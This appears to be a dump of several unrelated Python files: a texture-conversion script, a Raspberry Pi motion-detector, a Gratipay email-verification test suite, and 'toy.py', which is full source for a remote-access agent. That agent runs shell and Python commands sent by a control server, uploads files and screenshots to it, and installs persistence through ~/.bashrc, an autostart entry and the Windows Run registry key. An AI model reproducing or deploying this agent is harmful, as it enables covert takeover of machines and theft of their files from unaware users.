print('Could not create directory: 2K')
try:
os.mkdir("1K")
except OSError:
print('Could not create directory: 1K')
return
def ExecCmdCheck():
print('ExecCmdCheck')
return
def FindInArray(find_array, find):
for f in find_array:
if f.lower() in find.lower():
return 1
return 0
def TexConvertFunction(basisu, filename, options):
dir_path = os.path.dirname(os.path.realpath(__file__))
basisu_fullpath = dir_path + "\\" + basisu
command = '"%s" %s %s'%(
basisu_fullpath,
options,
filename
)
print("Converting [" + filename + "]")
DEVNULL = open(os.devnull, 'wb')
p = subprocess.call(command, stdout=DEVNULL, stderr=DEVNULL)
return
def KTXCompressFunction(compress, output, filename, options):
#output = os.path.splitext(filename)[0] + ".ktx"
command = '"%s" -o "%s" %s "%s"'%(
compress,
output,
options,
filename,
)
print(command)
DEVNULL = open(os.devnull, 'wb')
p = subprocess.call(command, stdout=DEVNULL, stderr=DEVNULL, shell=True)
# p = subprocess.call(command)
return
def ExecCmdFixAll():
print('ExecCmdFixAll')
start = time.time()
basisu = "basisu.exe"
ktxcompress = "ImageConvertTools/img2ktx.exe"
relative_input_dir = ""
relative_output_dir = ""
# expect user to provide which folder to fix
if len(sys.argv) < 4:
        print('fixall: missing arguments: using directory of script.')
else:
relative_input_dir = sys.argv[2]
relative_output_dir = sys.argv[3]
rootdir = os.path.join(os.path.dirname(os.path.realpath(__file__)), relative_input_dir)
print("Input directory: " + rootdir)
outputdir = os.path.join(os.path.dirname(os.path.realpath(__file__)), relative_output_dir)
print("Output directory: " + outputdir)
max_open_files = 128
extensions = [ ".png" ]
tasks = []
files_to_fix = []
temp_files = []
basis_files = []
files_open = 0
bc4_list = [ ]
print("Convert all PNG to BASIS")
for subdir, dirs, files in os.walk(rootdir):
for file in files:
ext = os.path.splitext(file)[-1].lower()
if ext in extensions:
filename = (os.path.join(subdir, file))
files_to_fix.append(filename)
for file in files_to_fix:
options = "-linear -level 4 "
if "normal" in file.lower():
options = options + "-userdata0 1 " + "-seperate_rg_to_color_alpha "
ext = os.path.splitext(file)[-1].lower()
temp_files.append(os.path.splitext(file)[0] + ".png")
basis_fn = os.path.basename(file)
basis_files.append(os.path.splitext(basis_fn)[0] + ".basis")
thread_args = (basisu, file, options)
t = threading.Thread(target=TexConvertFunction, args=thread_args)
t.start()
tasks.append(t)
files_open = files_open + 1
if files_open > max_open_files:
for thread in tasks:
thread.join()
files_open = 0
tasks = []
for thread in tasks:
thread.join()
print("Copy all BASIS fiiles to Output directory")
for file in basis_files:
currentFile = os.path.basename(file)
filename = (os.path.join(os.getcwd(), file))
print("Copying " + currentFile + " to output dir")
copyfile(filename, os.path.join(outputdir, file))
for file in basis_files:
os.remove(os.path.abspath(file))
for thread in tasks:
thread.join()
print("Convert all textures to mobile compressed format")
extensions = [ ".png" ]
tasks = []
ktx_files = []
files_to_fix = []
files_open = 0
for subdir, dirs, files in os.walk(rootdir):
for file in files:
ext = os.path.splitext(file)[-1].lower()
if ext in extensions:
filename = (os.path.join(subdir, file))
files_to_fix.append(filename)
for file in files_to_fix:
options = "-m"
ext = os.path.splitext(file)[-1].lower()
compress = ktxcompress
quality = "fast"
ktx_fn = os.path.basename(file)
new_name = os.path.splitext(ktx_fn)[0] + ".ktx"
ktx_files.append(new_name)
astc = "ASTC8x8"
if "normal" in file.lower():
options = options + " -f ASTC4x4 -flags \"-normal_psnr -%s\""%(quality)
else:
options = options + " -f %s -flags \"-%s\""%(astc, quality)
# KTXCompressFunction(compress=compress, filename=file, options=options)
thread_args = (compress, outputdir + "\\" + new_name, file, options)
t = threading.Thread(target=KTXCompressFunction, args=thread_args)
t.start()
tasks.append(t)
files_open = files_open + 1
if files_open > max_open_files:
for thread in tasks:
thread.join()
files_open = 0
tasks = []
for thread in tasks:
thread.join()
end = time.time()
print(end - start)
return
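# Illustrative invocation (not part of the original; directory names are hypothetical):
#   python ImageConvertTool.py fixall Textures/ Output/
# walks <script_dir>/Textures for .png files, converts each to .basis with
# basisu.exe and to .ktx with ImageConvertTools/img2ktx.exe, and copies the
# results into Output/.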
# ENTRY POINT --------------------------------------------------------------------------
def Main():
# arg check
if len(sys.argv) < 2:
PrintHelp()
return
# command check
cmd = sys.argv[1]
if not CheckCommand(cmd):
print('Incorrect command: ', cmd)
PrintHelp()
return
# exec commands
if cmd == CMD_FIXALL:
ExecCmdFixAll()
# print '# args: ', len(sys.argv)
# print ':: ', str(sys.argv)
if __name__ == "__main__":
Main()
|
main_motion.py
|
# coding=utf-8
'''
python 2.7
pi@raspberrypi ~ $ echo $LANG
zh_TW.UTF-8
https://pypi.python.org/pypi/Pillow/2.2.1
https://github.com/ashtons/picam
http://host:8888/
'''
import m_settings,m_pushover,m_tornado
import picam
import logging, threading,io,struct
import datetime, time
import Image
import httplib, urllib, json
import collections, array
# False when test
lastEvtTime = 0
width = 100
height = 100
stream = io.BytesIO()
def found(q):
global lastEvtTime
lastEvtTime = time.time()
logging.info("EVENT FOUND")
m_pushover.sendPushover(q)
def initLog():
dateTag = datetime.datetime.now().strftime("%Y%b%d_%H%M%S")
logging.basicConfig(filename="mt_%s.log" % dateTag, level=logging.DEBUG,
format='%(asctime)s - %(levelname)s - %(message)s')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
# set a format which is simpler for console use
formatter = logging.Formatter('%(asctime)s : %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
logging.info('Started')
def isMotion4(kl):
return len(kl) == 4 and kl[1] - kl[0] > 777 and kl[2] > 1000 and kl[3] > 1000
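# Illustrative note (not part of the original): kl holds the last four
# changed-pixel counts from runDiffCheck(); isMotion4 flags motion when the
# count jumped by more than 777 between the two oldest samples and both of the
# two newest samples stayed above 1000, e.g. [100, 900, 1200, 1500] -> True.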
def handleMotion(k, q):
if isMotion4(k):
ediff = time.time() - lastEvtTime
logging.debug("EvtTimeDiff=%d" % ediff)
if ediff > 300:
found(q)
def main():
initLog()
    t = threading.Thread(target=m_tornado.startTornado)
    t.start()
try:
runDiffCheck()
except (KeyboardInterrupt, SystemExit):
m_tornado.stopTornado()
raise
def testBinaryWrite():
return bytes(bytearray([0x13, 0x00, 0x00, 0x00, 0x08, 0x00]))
def testWriteBinJpeg():
if m_tornado.WSHandler.wsClients() > 0:
img = picam.takePhotoWithDetails(width,height, 85)
img.save(stream,'JPEG', quality=70)
m_tornado.WSHandler.wsSend('[5]')
m_tornado.WSHandler.wsSend(stream.getvalue(),binary=True)
stream.seek(0)
def testWriteBinRgb(rgbIntList):
if m_tornado.WSHandler.wsClients() > 0:
m_tornado.WSHandler.wsSend('[6]')
bytearr = bytearray()
for rgb in rgbIntList:
rarr = [ ord(c) for c in struct.pack("I", rgb) ]
# return [R,G,B,0]
bytearr.append(rarr[0])
bytearr.append(rarr[1])
bytearr.append(rarr[2])
m_tornado.WSHandler.wsSend(bytes(bytearr),binary=True)
def runDiffCheck():
k = collections.deque(maxlen=4)
THRESHOLD = 15
QUANITY_MIN = 50
f1 = picam.takeRGBPhotoWithDetails(width, height)
while True:
f2 = picam.takeRGBPhotoWithDetails(width, height)
m_tornado.WSHandler.wsSend(json.dumps(f2))
(m, q) = picam.difference(f1, f2, THRESHOLD)
testWriteBinRgb(m)
if q > 10 : logging.debug("px=%d", q)
k.append(q)
# print 'px %d' %q
msg = []
msg.append(q)
msg.append(m)
m_tornado.WSHandler.wsSend(json.dumps(msg))
testWriteBinJpeg()
picam.LEDOn() if q > QUANITY_MIN else picam.LEDOff()
handleMotion(k, q)
f1 = f2
if __name__ == '__main__':
main()
|
toy.py
|
#!/usr/bin/env python2
# coding: utf-8
import requests
import time
import os
import subprocess
import platform
import shutil
import sys
import traceback
import threading
import uuid
import StringIO
import zipfile
import tempfile
import socket
import getpass
if os.name == 'nt':
from PIL import ImageGrab
else:
import pyscreenshot as ImageGrab
import config
def threaded(func):
def wrapper(*_args, **kwargs):
t = threading.Thread(target=func, args=_args)
t.start()
return
return wrapper
class Agent(object):
def __init__(self):
self.idle = True
self.silent = False
self.platform = platform.system() + " " + platform.release()
self.last_active = time.time()
self.failed_connections = 0
self.uid = self.get_UID()
self.hostname = socket.gethostname()
self.username = getpass.getuser()
def get_install_dir(self):
install_dir = None
if platform.system() == 'Linux':
install_dir = self.expand_path('~/.ares')
elif platform.system() == 'Windows':
install_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
if os.path.exists(install_dir):
return install_dir
else:
return None
def is_installed(self):
return self.get_install_dir()
def get_consecutive_failed_connections(self):
if self.is_installed():
install_dir = self.get_install_dir()
check_file = os.path.join(install_dir, "failed_connections")
if os.path.exists(check_file):
with open(check_file, "r") as f:
return int(f.read())
else:
return 0
else:
return self.failed_connections
def update_consecutive_failed_connections(self, value):
if self.is_installed():
install_dir = self.get_install_dir()
check_file = os.path.join(install_dir, "failed_connections")
with open(check_file, "w") as f:
f.write(str(value))
else:
self.failed_connections = value
def log(self, to_log):
""" Write data to agent log """
print(to_log)
def get_UID(self):
""" Returns a unique ID for the agent """
return getpass.getuser() + "_" + str(uuid.getnode())
def server_hello(self):
""" Ask servuuid.getnode()er for instructions """
req = requests.post(config.SERVER + '/api/' + self.uid + '/hello',
json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username})
return req.text
def send_output(self, output, newlines=True):
""" Send console output to server """
if self.silent:
self.log(output)
return
if not output:
return
if newlines:
output += "\n\n"
req = requests.post(config.SERVER + '/api/' + self.uid + '/report',
data={'output': output})
def expand_path(self, path):
""" Expand environment variables and metacharacters in a path """
return os.path.expandvars(os.path.expanduser(path))
@threaded
def runcmd(self, cmd):
""" Runs a shell command and returns its output """
try:
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
output = (out + err)
self.send_output(output)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def python(self, command_or_file):
""" Runs a python command or a python file and returns the output """
new_stdout = StringIO.StringIO()
old_stdout = sys.stdout
sys.stdout = new_stdout
new_stderr = StringIO.StringIO()
old_stderr = sys.stderr
sys.stderr = new_stderr
if os.path.exists(command_or_file):
self.send_output("[*] Running python file...")
with open(command_or_file, 'r') as f:
python_code = f.read()
try:
exec(python_code)
except Exception as exc:
self.send_output(traceback.format_exc())
else:
self.send_output("[*] Running python command...")
try:
exec(command_or_file)
except Exception as exc:
self.send_output(traceback.format_exc())
sys.stdout = old_stdout
sys.stderr = old_stderr
self.send_output(new_stdout.getvalue() + new_stderr.getvalue())
def cd(self, directory):
""" Change current directory """
os.chdir(self.expand_path(directory))
@threaded
def upload(self, file):
""" Uploads a local file to the server """
file = self.expand_path(file)
try:
if os.path.exists(file) and os.path.isfile(file):
self.send_output("[*] Uploading %s..." % file)
requests.post(config.SERVER + '/api/' + self.uid + '/upload',
files={'uploaded': open(file, 'rb')})
else:
self.send_output('[!] No such file: ' + file)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def download(self, file, destination=''):
""" Downloads a file the the agent host through HTTP(S) """
try:
destination = self.expand_path(destination)
if not destination:
destination= file.split('/')[-1]
self.send_output("[*] Downloading %s..." % file)
req = requests.get(file, stream=True)
with open(destination, 'wb') as f:
for chunk in req.iter_content(chunk_size=8000):
if chunk:
f.write(chunk)
self.send_output("[+] File downloaded: " + destination)
except Exception as exc:
self.send_output(traceback.format_exc())
def persist(self):
""" Installs the agent """
if not getattr(sys, 'frozen', False):
self.send_output('[!] Persistence only supported on compiled agents.')
return
if self.is_installed():
self.send_output('[!] Agent seems to be already installed.')
return
if platform.system() == 'Linux':
persist_dir = self.expand_path('~/.ares')
if not os.path.exists(persist_dir):
os.makedirs(persist_dir)
agent_path = os.path.join(persist_dir, os.path.basename(sys.executable))
shutil.copyfile(sys.executable, agent_path)
os.system('chmod +x ' + agent_path)
if os.path.exists(self.expand_path("~/.config/autostart/")):
desktop_entry = "[Desktop Entry]\nVersion=1.0\nType=Application\nName=Ares\nExec=%s\n" % agent_path
with open(self.expand_path('~/.config/autostart/ares.desktop'), 'w') as f:
f.write(desktop_entry)
else:
with open(self.expand_path("~/.bashrc"), "a") as f:
f.write("\n(if [ $(ps aux|grep " + os.path.basename(sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n")
elif platform.system() == 'Windows':
persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
if not os.path.exists(persist_dir):
os.makedirs(persist_dir)
agent_path = os.path.join(persist_dir, os.path.basename(sys.executable))
shutil.copyfile(sys.executable, agent_path)
cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares /t REG_SZ /d \"%s\"" % agent_path
subprocess.Popen(cmd, shell=True)
self.send_output('[+] Agent installed.')
def clean(self):
""" Uninstalls the agent """
if platform.system() == 'Linux':
persist_dir = self.expand_path('~/.ares')
if os.path.exists(persist_dir):
shutil.rmtree(persist_dir)
desktop_entry = self.expand_path('~/.config/autostart/ares.desktop')
if os.path.exists(desktop_entry):
os.remove(desktop_entry)
os.system("grep -v .ares .bashrc > .bashrc.tmp;mv .bashrc.tmp .bashrc")
elif platform.system() == 'Windows':
persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
cmd = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares"
subprocess.Popen(cmd, shell=True)
cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % (persist_dir, persist_dir)
subprocess.Popen(cmd, shell=True)
self.send_output('[+] Agent removed successfully.')
def exit(self):
""" Kills the agent """
self.send_output('[+] Exiting... (bye!)')
sys.exit(0)
@threaded
def zip(self, zip_name, to_zip):
""" Zips a folder or file """
try:
zip_name = self.expand_path(zip_name)
to_zip = self.expand_path(to_zip)
if not os.path.exists(to_zip):
self.send_output("[+] No such file or directory: %s" % to_zip)
return
self.send_output("[*] Creating zip archive...")
zip_file = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)
if os.path.isdir(to_zip):
relative_path = os.path.dirname(to_zip)
for root, dirs, files in os.walk(to_zip):
for file in files:
zip_file.write(os.path.join(root, file), os.path.join(root, file).replace(relative_path, '', 1))
else:
zip_file.write(to_zip, os.path.basename(to_zip))
zip_file.close()
self.send_output("[+] Archive created: %s" % zip_name)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def screenshot(self):
""" Takes a screenshot and uploads it to the server"""
screenshot = ImageGrab.grab()
tmp_file = tempfile.NamedTemporaryFile()
screenshot_file = tmp_file.name + ".png"
tmp_file.close()
screenshot.save(screenshot_file)
self.upload(screenshot_file)
def help(self):
""" Displays the help """
self.send_output(config.HELP)
def run(self):
""" Main loop """
self.silent = True
if config.PERSIST:
try:
self.persist()
except:
self.log("Failed executing persistence")
self.silent = False
while True:
try:
todo = self.server_hello()
self.update_consecutive_failed_connections(0)
# Something to do ?
if todo:
commandline = todo
self.idle = False
self.last_active = time.time()
self.send_output('$ ' + commandline)
split_cmd = commandline.split(" ")
command = split_cmd[0]
args = []
if len(split_cmd) > 1:
args = split_cmd[1:]
try:
if command == 'cd':
if not args:
self.send_output('usage: cd </path/to/directory>')
else:
self.cd(args[0])
elif command == 'upload':
if not args:
self.send_output('usage: upload <localfile>')
else:
self.upload(args[0],)
elif command == 'download':
if not args:
self.send_output('usage: download <remote_url> <destination>')
else:
if len(args) == 2:
self.download(args[0], args[1])
else:
self.download(args[0])
elif command == 'clean':
self.clean()
elif command == 'persist':
self.persist()
elif command == 'exit':
self.exit()
elif command == 'zip':
if not args or len(args) < 2:
self.send_output('usage: zip <archive_name> <folder>')
else:
self.zip(args[0], " ".join(args[1:]))
elif command == 'python':
if not args:
self.send_output('usage: python <python_file> or python <python_command>')
else:
self.python(" ".join(args))
elif command == 'screenshot':
self.screenshot()
elif command == 'help':
self.help()
else:
self.runcmd(commandline)
except Exception as exc:
self.send_output(traceback.format_exc())
else:
if self.idle:
time.sleep(config.HELLO_INTERVAL)
elif (time.time() - self.last_active) > config.IDLE_TIME:
self.log("Switching to idle mode...")
self.idle = True
else:
time.sleep(0.5)
except Exception as exc:
self.log(traceback.format_exc())
failed_connections = self.get_consecutive_failed_connections()
failed_connections += 1
self.update_consecutive_failed_connections(failed_connections)
self.log("Consecutive failed connections: %d" % failed_connections)
if failed_connections > config.MAX_FAILED_CONNECTIONS:
self.silent = True
self.clean()
self.exit()
time.sleep(config.HELLO_INTERVAL)
def main():
agent = Agent()
agent.run()
if __name__ == "__main__":
main()
|
test_participant_emails.py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import json
import Queue
import sys
import threading
import urllib
import mock
from pytest import raises
from gratipay.exceptions import CannotRemovePrimaryEmail, EmailTaken, EmailNotVerified
from gratipay.exceptions import TooManyEmailAddresses, Throttled, EmailAlreadyVerified
from gratipay.exceptions import EmailNotOnFile, ProblemChangingEmail
from gratipay.testing import P, Harness
from gratipay.testing.email import QueuedEmailHarness
from gratipay.models.package import NPM, Package
from gratipay.models.participant import email as _email
from gratipay.utils import encode_for_querystring
from gratipay.cli import queue_branch_email as _queue_branch_email
class Alice(QueuedEmailHarness):
def setUp(self):
QueuedEmailHarness.setUp(self)
self.alice = self.make_participant('alice', claimed_time='now')
def add(self, participant, address, _flush=False):
participant.start_email_verification(address)
nonce = participant.get_email(address).nonce
result = participant.finish_email_verification(address, nonce)
assert result == (_email.VERIFICATION_SUCCEEDED, [], None)
if _flush:
self.app.email_queue.flush()
class TestEndpoints(Alice):
def hit_email_spt(self, action, address, user='alice', package_ids=[], should_fail=False):
f = self.client.PxST if should_fail else self.client.POST
# Aspen's test client should really support URL-encoding POST data for
# us, but it doesn't (it only supports multipart, which I think maybe
# doesn't work because of other Aspen bugs around multiple package_id
# values in the same POST body in that case?), so let's do that
# ourselves.
data = [ ('action', action)
, ('address', address)
] + [('package_id', str(p)) for p in package_ids]
body = urllib.urlencode(data)
response = f( '/~alice/emails/modify.json'
, body=body
, content_type=b'application/x-www-form-urlencoded'
, auth_as=user
, HTTP_ACCEPT_LANGUAGE=b'en'
)
if issubclass(response.__class__, (ProblemChangingEmail, Throttled)):
response.render_body({'_': lambda a: a})
return response
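        # Illustrative note (not part of the original): the hand-rolled body above
        # urlencodes to something like (address and package ids are hypothetical):
        #   action=add-email&address=alice%40gratipay.com
        #   action=start-verification&address=alice%40gratipay.com&package_id=1&package_id=2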
def hit_verify_spt(self, email, nonce, username='alice', should_fail=False):
# Email address is encoded in url.
url = '/~%s/emails/verify.html?email=%s&nonce=%s'
url %= (username, encode_for_querystring(email), nonce)
f = self.client.GxT if should_fail else self.client.GET
return f(url, auth_as=username)
def verify_and_change_email(self, old_email, new_email, username='alice', _flush=True):
self.hit_email_spt('add-email', old_email)
nonce = P(username).get_email(old_email).nonce
self.hit_verify_spt(old_email, nonce)
self.hit_email_spt('add-email', new_email)
if _flush:
self.app.email_queue.flush()
def test_participant_can_start_email_verification(self):
response = self.hit_email_spt('add-email', 'alice@gratipay.com')
assert json.loads(response.body) == 'Check your inbox for a verification link.'
def test_starting_email_verification_triggers_verification_email(self):
self.hit_email_spt('add-email', 'alice@gratipay.com')
assert self.count_email_messages() == 1
last_email = self.get_last_email()
assert last_email['to'] == 'alice <alice@gratipay.com>'
expected = "We've received a request to connect alice@gratipay.com to the alice account"
assert expected in last_email['body_text']
def test_email_address_is_encoded_in_sent_verification_link(self):
address = 'alice@gratipay.com'
encoded = encode_for_querystring(address)
self.hit_email_spt('add-email', address)
last_email = self.get_last_email()
assert "~alice/emails/verify.html?email="+encoded in last_email['body_text']
def test_verification_email_doesnt_contain_unsubscribe(self):
self.hit_email_spt('add-email', 'alice@gratipay.com')
last_email = self.get_last_email()
assert "To stop receiving" not in last_email['body_text']
def test_verifying_second_email_sends_verification_notice(self):
self.verify_and_change_email('alice1@example.com', 'alice2@example.com', _flush=False)
assert self.count_email_messages() == 3
last_email = self.get_last_email()
self.app.email_queue.flush()
assert last_email['to'] == 'alice <alice1@example.com>'
expected = "We are connecting alice2@example.com to the alice account on Gratipay"
assert expected in last_email['body_text']
def test_post_anon_returns_401(self):
response = self.hit_email_spt('add-email', 'anon@example.com', user=None, should_fail=True)
assert response.code == 401
def test_post_with_no_at_symbol_is_400(self):
response = self.hit_email_spt('add-email', 'gratipay.com', should_fail=True)
assert response.code == 400
def test_post_with_no_period_symbol_is_400(self):
response = self.hit_email_spt('add-email', 'test@gratipay', should_fail=True)
assert response.code == 400
def test_post_with_long_address_is_okay(self):
response = self.hit_email_spt('add-email', ('a'*242) + '@example.com')
assert response.code == 200
def test_post_with_looooong_address_is_400(self):
response = self.hit_email_spt('add-email', ('a'*243) + '@example.com', should_fail=True)
assert response.code == 400
def test_post_too_quickly_is_400(self):
self.hit_email_spt('add-email', 'alice@example.com')
self.hit_email_spt('add-email', 'alice+a@example.com')
self.hit_email_spt('add-email', 'alice+b@example.com')
response = self.hit_email_spt('add-email', 'alice+c@example.com', should_fail=True)
assert response.code == 400
assert 'too quickly' in response.body
def test_verify_email_without_adding_email(self):
response = self.hit_verify_spt('', 'sample-nonce')
assert 'Bad Info' in response.body
def test_verify_email_wrong_nonce(self):
self.hit_email_spt('add-email', 'alice@example.com')
nonce = 'fake-nonce'
result = self.alice.finish_email_verification('alice@gratipay.com', nonce)
assert result == (_email.VERIFICATION_FAILED, None, None)
self.hit_verify_spt('alice@example.com', nonce)
expected = None
actual = P('alice').email_address
assert expected == actual
def test_verify_email_a_second_time_returns_redundant(self):
address = 'alice@example.com'
self.hit_email_spt('add-email', address)
nonce = self.alice.get_email(address).nonce
self.alice.finish_email_verification(address, nonce)
result = self.alice.finish_email_verification(address, nonce)
assert result == (_email.VERIFICATION_REDUNDANT, None, None)
def test_verify_email_expired_nonce_fails(self):
address = 'alice@example.com'
self.hit_email_spt('add-email', address)
self.db.run("""
UPDATE email_addresses
SET verification_start = (now() - INTERVAL '25 hours')
WHERE participant_id = %s;
""", (self.alice.id,))
nonce = self.alice.get_email(address).nonce
result = self.alice.finish_email_verification(address, nonce)
assert result == (_email.VERIFICATION_FAILED, None, None)
actual = P('alice').email_address
assert actual == None
def test_finish_email_verification(self):
self.hit_email_spt('add-email', 'alice@example.com')
nonce = self.alice.get_email('alice@example.com').nonce
assert self.hit_verify_spt('alice@example.com', nonce).code == 200
assert P('alice').email_address == 'alice@example.com'
def test_empty_email_fails(self):
for empty in ('', ' '):
result = self.alice.finish_email_verification(empty, 'foobar')
assert result == (_email.VERIFICATION_FAILED, None, None)
def test_empty_nonce_fails(self):
for empty in ('', ' '):
result = self.alice.finish_email_verification('foobar', empty)
assert result == (_email.VERIFICATION_FAILED, None, None)
def test_email_verification_is_backwards_compatible(self):
"""Test email verification still works with 'email2' field in verification link.
"""
username = 'alice'
email = 'alice@example.com'
self.hit_email_spt('add-email', email)
nonce = self.alice.get_email(email).nonce
url = '/~%s/emails/verify.html?email2=%s&nonce=%s'
url %= (username, encode_for_querystring(email), nonce)
self.client.GET(url, auth_as=username)
expected = email
actual = P(username).email_address
assert expected == actual
def test_verified_email_is_not_changed_after_update(self):
self.verify_and_change_email('alice@example.com', 'alice@example.net')
expected = 'alice@example.com'
actual = P('alice').email_address
assert expected == actual
def test_get_emails(self):
self.verify_and_change_email('alice@example.com', 'alice@example.net')
emails = self.alice.get_emails()
assert len(emails) == 2
def test_verify_email_after_update(self):
self.verify_and_change_email('alice@example.com', 'alice@example.net')
nonce = self.alice.get_email('alice@example.net').nonce
self.hit_verify_spt('alice@example.net', nonce)
expected = 'alice@example.com'
actual = P('alice').email_address
assert expected == actual
def test_nonce_is_not_reused_when_resending_email(self):
self.hit_email_spt('add-email', 'alice@example.com')
nonce1 = self.alice.get_email('alice@example.com').nonce
self.hit_email_spt('resend', 'alice@example.com')
nonce2 = self.alice.get_email('alice@example.com').nonce
assert nonce1 != nonce2
def test_emails_page_shows_emails(self):
self.verify_and_change_email('alice@example.com', 'alice@example.net')
body = self.client.GET("/~alice/emails/", auth_as="alice").body
assert 'alice@example.com' in body
assert 'alice@example.net' in body
def test_set_primary(self):
self.verify_and_change_email('alice@example.com', 'alice@example.net')
self.verify_and_change_email('alice@example.net', 'alice@example.org')
self.hit_email_spt('set-primary', 'alice@example.com')
def test_cannot_set_primary_to_unverified(self):
with self.assertRaises(EmailNotVerified):
self.hit_email_spt('set-primary', 'alice@example.com')
def test_remove_email(self):
# Can remove unverified
self.hit_email_spt('add-email', 'alice@example.com')
self.hit_email_spt('remove', 'alice@example.com')
# Can remove verified
self.verify_and_change_email('alice@example.com', 'alice@example.net')
self.verify_and_change_email('alice@example.net', 'alice@example.org')
self.hit_email_spt('remove', 'alice@example.net')
# Cannot remove primary
with self.assertRaises(CannotRemovePrimaryEmail):
self.hit_email_spt('remove', 'alice@example.com')
def test_participant_can_verify_a_package_along_with_email(self):
foo = self.make_package(name='foo', emails=['alice@gratipay.com'])
response = self.hit_email_spt( 'start-verification'
, 'alice@gratipay.com'
, package_ids=[foo.id]
)
assert json.loads(response.body) == 'Check your inbox for a verification link.'
assert self.db.all('select package_id from claims order by package_id') == [foo.id]
def test_participant_cant_verify_packages_with_add_email_or_resend(self):
foo = self.make_package(name='foo', emails=['alice@gratipay.com'])
for action in ('add-email', 'resend'):
assert self.hit_email_spt( action
, 'alice@gratipay.com'
, package_ids=[foo.id]
, should_fail=True
).code == 400
def test_participant_can_verify_multiple_packages_along_with_email(self):
package_ids = [self.make_package(name=name, emails=['alice@gratipay.com']).id
for name in ('foo', 'bar', 'baz', 'buz')]
response = self.hit_email_spt( 'start-verification'
, 'alice@gratipay.com'
, package_ids=package_ids
)
assert json.loads(response.body) == 'Check your inbox for a verification link.'
assert self.db.all('select package_id from claims order by package_id') == package_ids
def test_package_verification_fails_if_email_not_listed(self):
foo = self.make_package()
response = self.hit_email_spt( 'start-verification'
, 'bob@gratipay.com'
, package_ids=[foo.id]
, should_fail=True
)
assert response.code == 400
assert self.db.all('select package_id from claims order by package_id') == []
def test_package_verification_fails_if_package_id_is_garbage(self):
response = self.hit_email_spt( 'start-verification'
, 'bob@gratipay.com'
, package_ids=['cheese monkey']
, should_fail=True
)
assert response.code == 400
assert self.db.all('select package_id from claims order by package_id') == []
def test_package_reverification_succeeds_if_package_is_already_claimed_by_self(self):
foo = self.make_package()
self.claim_package('alice', foo)
response = self.hit_email_spt( 'start-verification'
, 'alice@example.com'
, package_ids=[foo.id]
)
assert response.code == 200
def test_package_verification_fails_if_package_is_already_claimed_by_other(self):
self.make_participant('bob', claimed_time='now', email_address='bob@example.com')
foo = self.make_package(emails=['alice@example.com', 'bob@example.com'])
self.claim_package('bob', foo)
response = self.hit_email_spt( 'start-verification'
, 'alice@example.com'
, package_ids=[foo.id]
, should_fail=True
)
assert response.code == 400
class TestFunctions(Alice):
def test_cannot_update_email_to_already_verified(self):
bob = self.make_participant('bob', claimed_time='now')
self.add(self.alice, 'alice@gratipay.com')
with self.assertRaises(EmailTaken):
bob.start_email_verification('alice@gratipay.com')
nonce = bob.get_email('alice@gratipay.com').nonce
bob.finish_email_verification('alice@gratipay.com', nonce)
email_alice = P('alice').email_address
assert email_alice == 'alice@gratipay.com'
def test_html_escaping(self):
self.alice.start_email_verification("foo'bar@example.com")
last_email = self.get_last_email()
        assert 'foo&#39;bar' in last_email['body_html']
        assert '&#39;' not in last_email['body_text']
def test_npm_package_name_is_handled_safely(self):
foo = self.make_package(name='<script>')
self.alice.start_email_verification("alice@example.com", foo)
last_email = self.get_last_email()
        assert '<b>&lt;script&gt;</b>' in last_email['body_html']
assert '<script>' in last_email['body_text']
class TestGetRecentlyActiveParticipants(QueuedEmailHarness):
def check(self):
return _queue_branch_email.get_recently_active_participants(self.db)
def test_gets_recently_active_participants(self):
alice = self.make_participant_with_exchange('alice')
assert self.check() == [alice]
def test_ignores_participants_with_no_exchanges(self):
self.make_participant('alice', claimed_time='now', email_address='a@example.com')
assert self.check() == []
def test_ignores_participants_with_no_recent_exchanges(self):
self.make_participant_with_exchange('alice')
self.db.run("UPDATE exchanges SET timestamp = timestamp - '181 days'::interval")
assert self.check() == []
def test_keeps_participants_straight(self):
alice = self.make_participant_with_exchange('alice')
bob = self.make_participant_with_exchange('bob')
self.make_participant_with_exchange('carl')
self.db.run("UPDATE exchanges SET timestamp = timestamp - '181 days'::interval "
"WHERE participant='carl'")
self.make_participant('dana', claimed_time='now', email_address='d@example.com')
assert self.check() == [alice, bob]
class TestQueueBranchEmail(QueuedEmailHarness):
def queue_branch_email(self, username, _argv=None, _input=None, _print=None):
_argv = ['', username] if _argv is None else _argv
_input = _input or (lambda prompt: 'y')
stdout, stderr = [], []
def _print(string, file=None):
buf = stderr if file is sys.stderr else stdout
buf.append(str(string))
_print = _print or (lambda *a, **kw: None)
try:
_queue_branch_email.main(_argv, _input, _print, self.app)
except SystemExit as exc:
retcode = exc.args[0]
else:
retcode = 0
return retcode, stdout, stderr
def test_is_fine_with_no_participants(self):
retcode, output, errors = self.queue_branch_email('all')
assert retcode == 0
assert output == ['Okay, you asked for it!', '0']
assert errors == []
assert self.count_email_messages() == 0
def test_queues_for_one_participant(self):
alice = self.make_participant_with_exchange('alice')
retcode, output, errors = self.queue_branch_email('all')
assert retcode == 0
assert output == [ 'Okay, you asked for it!'
, '1'
, 'spotcheck: alice@example.com (alice={})'.format(alice.id)
]
assert errors == [' 1 queuing for alice@example.com (alice={})'.format(alice.id)]
assert self.count_email_messages() == 1
def test_queues_for_two_participants(self):
alice = self.make_participant_with_exchange('alice')
bob = self.make_participant_with_exchange('bob')
retcode, output, errors = self.queue_branch_email('all')
assert retcode == 0
